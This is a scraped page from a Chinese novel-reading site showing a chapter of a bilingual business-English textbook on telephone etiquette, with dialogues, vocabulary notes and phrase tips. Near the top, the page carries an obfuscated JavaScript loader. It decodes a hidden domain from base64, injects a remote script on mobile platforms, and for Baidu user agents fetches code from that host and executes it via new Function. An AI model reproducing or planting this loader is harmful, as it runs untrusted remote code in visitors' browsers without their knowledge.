妙书阁小说

阅读记录  |   用户书架
上一章
目录 | 设置
下一页
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};

02 电话礼仪(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

02 电话礼仪

接打电话有一套

dialogue

tom is making a call to one of his customers and inquiring something about the products he sold before.

汤姆正在给他的一位客户打电话,向他咨询以前售出的产品的状况。

tom: hello, this is tom kant from international trade co. limited. could i speak to mr. smith?

汤姆:你好,我是国际贸易有限责任公司的汤姆·康德。我可以和史密斯先生通电话吗?

mr. smith: speaking please.

史密斯先生:我就是。

tom: i&#039;m sorry to disturb you. you purchased our equipment last year and now i&#039;d like to find out about their workings. are they still in gear now?

汤姆:很抱歉打扰您了。您去年购买了我们的设备, 我现在想了解它们的使用情况。它们现在是否还正常运转?

mr. smith: yeah, exactly! we bought them last year. at present, they are still in good condition.

史密斯先生:是的,我是去年购买的。目前,它们状态良好!

tom: that&#039;s it! all of them have first-class quality and performance. every instrument is subject to strict inspection before shipment. now we have researched and developed new products.

汤姆:这就对了!它们的质量和性能都是一流的。每件设备在装运前都是经过严格检验的。现在,我们还研发了新产品。

mr. smith: your company is developing so fast. maybe later on we&#039;ll cooperate again.

史密斯先生:你们公司发展得真快。或许以后我们还会再次合作。

tom: that&#039;s terrific! if any, please remember to call us. i won&#039;t keep you any longer.goodbye, mr. smith.

汤姆:那太好了!如果有需要的话,记得联系我们。我就不再打扰您了!再见,史密斯先生。

mr. smith: bye!

史密斯先生:再见!

notes

1. working [w?:ki?] n. 运作;工作方法;劳动

2. be in gear 处于正常工作情况的

3. in good condition 状况良好

4. be subject to 遭受;服从;以……为条件

5. inspection [in&#039;spek??n] n. 检查,检验;视察

小贴士

1. hello, may i speak to william?

你好,我可以和威廉通电话吗?

也可以这样说:

may i have william, please?

2. i have something urgent to consult miss brown.

我有急事要找布朗小姐。

3. i&#039;m sorry to call you so late.

对不起,这么晚打来电话。

4. i hope i didn&#039;t catch you at a bad time.

希望没有打扰你。

5. who is that speaking?

请问您是哪位?

也可以这样说:

who is calling, please?

6. i&#039;m sorry to have kept you waiting so long.

抱歉让你久等了。

7. could you just wait for a moment, please?

请稍等一会儿好吗?

不小心打错电话

dialogue

julia wants to call mr. kant of the finance department. but she got the wrong number.

朱莉亚想要给财务部的康德先生打电话,但是她拨错号码了。

julia: hello, could i speak to mr. kant?

朱莉亚:你好,我可以和康德先生通电话吗?

a: there are two mr. kants here. which one do you like to talk to?

a: 这有两位康德先生。您找哪一个?

julia: i&#039;d like to talk to james kant. may i have him?

朱莉亚:我找吉姆斯·康德。我可以和他讲话吗?

a: sorry, i beg your pardon?

a:不好意思,请再说一遍。

julia: james kant.

朱莉亚:吉姆斯·康德。

a: i&#039;m sorry, but there&#039;s no one here by that name.

a:对不起,没有这个人。

julia: isn&#039;t this the finance department?

朱莉亚:这不是财务部吗?

a: i&#039;m afraid you dialed the wrong number. this is the home telephone.

a:恐怕你拨错号码了,这是家庭电话。

julia: oh, sorry to have bothered you.

朱莉亚:哦,真对不起,打扰您了。

a: it doesn&#039;t matter.

a:没关系。

notes

1. finance departmen 财务部

2. dial [&#039;dai?l] v. 拨号,打电话

3. bother [&#039;b?e?] v. 烦扰,使恼怒;使不安,费心

小贴士

1. i&#039;m sorry, but we don&#039;t have anyone by that name here.

对不起,我们这没这个人。

也可以这样说:

i&#039;m sorry, but there is no one called susan here.

2. oh, sorry to have disturbed you.

哦,真对不起,打扰您了。

3. i beg you pardon? mr. who?

请再说一遍,你找谁?

4. what number are you trying to dial?

你要的电话是什么号码?

也可以这样说:

what number are you calling?

5. will you check the number again, please?

请您再核对一下电话号码好吗?

6. i suggest you look in the phone book again.

我建议您再查一下电话簿。

7. are you sure you are dialing the right number?

你确定你打的号码是对的吗?

8. could you check the number for me, please?

可否帮我核实一下这个号码?

也可以这样说:

could you test the number for me, please?

无法接听电话

dialogue

steven meets some problems in his work, so he wants to ask for advice from susan. now he is giving susan a ring. but susan is not in.

史蒂文在工作中遇到了一些问题,他想请教苏珊。现在他正在给苏珊打电话,但是苏珊不在办公室。

steven: hello, may i speak to susan please?

史蒂文:你好,请找一下苏珊好吗?

a: i&#039;m sorry, she is not in.

a:对不起,她不在。

steven: can you tell me how long she&#039;ll be back? i want to come to her for some advice about my work.

史蒂文:能告诉我她多久会回来吗?我想向她请教一些工作方面的问题。

a: sorry, i have no idea. she is on business trip at present. why don&#039;t you call her cell phone?

a:抱歉,我不知道。她目前在出差。为什么你不打她的手机呢?

steven: i&#039;d like to. but i don&#039;t have her cell phone number. can you tell me about it?

史蒂文:我是想,但是我没有她的手机号码。你能告诉我她的号码吗?

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间